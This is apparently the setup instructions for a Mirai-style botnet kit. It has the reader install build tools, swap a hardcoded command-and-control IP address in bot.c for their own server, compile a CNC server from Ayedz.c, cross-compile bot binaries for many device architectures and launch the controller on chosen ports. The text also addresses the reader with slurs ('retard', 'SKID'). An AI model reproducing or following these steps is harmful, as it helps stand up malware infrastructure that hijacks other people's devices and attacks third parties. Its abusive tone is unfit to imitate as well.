1. ok so if you dont know retard put all of the files in

2. yum update -y

3.yum install python python-paramiko gcc nano nc screen psmisc bzip2 wget -y

4. Go to bot.c and do ctrl f then search for 194.15.36.53 and replace all of them with your server ip
MOST IMPORTANT THING SKID^^^

5. gcc Ayedz.c -o cnc -pthread; rm -rf Ayedz.c

6. nano Ayedz.txt (user pass admin)

7. python bins.py bot.c 1.1.1.1 (make 1.1.1.1 your server ip)


8. screen ./cnc 666 1 8899 (9670 can be changed to any port you want <3)


(optional)to make your server look better just paste this is

rm -rf cross-compiler-armv4l cross-compiler-armv5l cross-compiler-armv6l cross-compiler-armv7l cross-compiler-i586 cross-compiler-i686 cross-compiler-m68k cross-compiler-mips cross-compiler-mipsel cross-compiler-powerpc cross-compiler-powerpc-440fp cross-compiler-sh4 cross-compiler-sparc cross-compiler-x86_64